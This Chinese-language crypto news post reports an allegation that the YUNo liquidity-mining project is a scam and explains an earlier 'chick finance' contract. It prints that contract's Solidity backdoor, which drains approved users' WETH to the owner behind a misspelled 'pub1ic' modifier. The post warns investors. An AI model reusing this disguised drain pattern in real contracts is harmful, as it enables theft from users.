Discord社区用户：YUNo是一个骗局，项目方可以盗取资金

9月1日，Discord社区用户“sadcat”表示，流动性挖矿项目YUNo是一个骗局，他在代码中发现了无限增发的函数，项目方可以盗取资金。他还表示，他将自己的发现发到了YUNo的官方电报群里并被踢出了群。据了解，YUNo协议的代码尚未通过安全审计。

流动性挖矿的项目很多，投资者还是尽量选择那些经过代码审计的项目，否则你将很容易血本无归。

很明显之前也出现过合约代码问题，之前有个名叫chick finance的项目。下文来自比特派钱包。

任何给该合约授权了的用户，开发者都能把你钱包里的代币一扫而空（不仅仅是你存入合约的）。

function startReward(address _from, uint256 amount) external pub1ic{

weth.safeTransferFrom(_from, owner(), amount);

}

开发者对故意拼写错误的 pub1ic 做了如下约束（也就是只有合约 Owner 才能调用，如果没这个调用，那就变成谁都能干这事儿了，开发者想的是自己偷，肯定不想让别人偷）

modifier pub1ic() {

require(isOwner(), “Ownable: caller is not the owner”);

_;

}

上述代码的逻辑很简单，干的就是那些给这个合约授权了的用户，合约 Owner 都能把你的代币转给 Owner，就这么简单。

对此给你们的建议就是在自己能承受的范围内参与流动性挖矿，不过目前的手续费比较贵，所以可能对于小资金玩家来说并不是那么友好。

量力而行.

猜您喜欢: